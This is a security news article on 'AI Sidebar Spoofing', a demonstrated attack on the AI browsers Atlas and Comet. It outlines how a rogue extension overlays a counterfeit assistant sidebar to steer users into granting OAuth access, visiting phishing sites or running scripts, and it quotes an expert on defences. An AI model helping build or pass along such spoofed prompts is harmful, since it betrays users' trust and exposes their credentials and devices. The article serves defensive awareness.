AI Browsers Atlas and Comet Found Vulnerable to Sidebar Spoofing Attacks
- Cyber Jill
- 4 hours ago
- 2 min read
Researchers have uncovered a new exploit that targets the AI-powered browsers Atlas by OpenAI and Comet by Perplexity, showing how attackers can create fake AI sidebars indistinguishable from the real interface to deliver malicious commands.
The vulnerability—dubbed AI Sidebar Spoofing—was demonstrated by cybersecurity firm SquareX, which found that a rogue browser extension could overlay a counterfeit sidebar capable of intercepting every user interaction. The spoof mimics the authentic AI assistant UI so convincingly that victims may unknowingly follow harmful prompts, such as granting OAuth permissions, visiting phishing sites, or executing malicious scripts.
Both Atlas and Comet integrate large language models directly into the browsing experience, enabling users to summarize pages, run commands, and automate tasks. However, as SquareX’s findings reveal, that integration also broadens the potential attack surface by merging AI systems with browser-level trust.
Gabrielle Hempel, Security Operations Strategist at Exabeam, says this moment signals a critical inflection point for browser security:
“This incident is a warning shot for the early days of agentic browsing and that the implicit trust model of the UI needs rethinking. The main issue here is that agentic-AI browsers introduce an entirely new attack surface. This attack, a malicious extension injecting a fake AI sidebar overlay that looks like the real one, allows threat actors to hijack the ‘trusted’ AI assistant UI and trick users into executing dangerous operations. Organizations need to be taking this seriously because when you delegate browsing and actions to an AI sidebar, you are elevating what previously might have been a minor risk into a material risk to cloud assets, credentials, and devices.
Traditional controls will struggle with this because the spoof doesn’t use a normal remote-code vulnerability, it exploits UI trust and overlay control via extension JavaScript injecting into every page. Standard browser protections like same-origin policy and extension permission models are insufficient when an AI agent is operating with elevated context and acting on behalf of the user.
For organizations, it’s going to be important to restrict AI browser use for high-risk functions until they are proven secure. Because the attack uses an extension with host and storage permissions, organizations should revisit their extension approval workflows for those as well. Any productivity tool that requests broad access should require scrutiny. Segmentation is also important once these tools are implemented: least privilege applies here and AI interaction with certain tabs/services should be limited.
For the industry, it’s going to be important to define security standards for these browsers. What constitutes an acceptable risk profile? How are agents audited? What logging and traceability is required when an agent executes actions for a user?”
As AI becomes embedded deeper into browsing and productivity tools, Hempel’s warning underscores a growing realization: trust in the interface itself is now an attack vector. Until the ecosystem matures, experts recommend treating AI browsers as experimental—and limiting their access to sensitive data or accounts.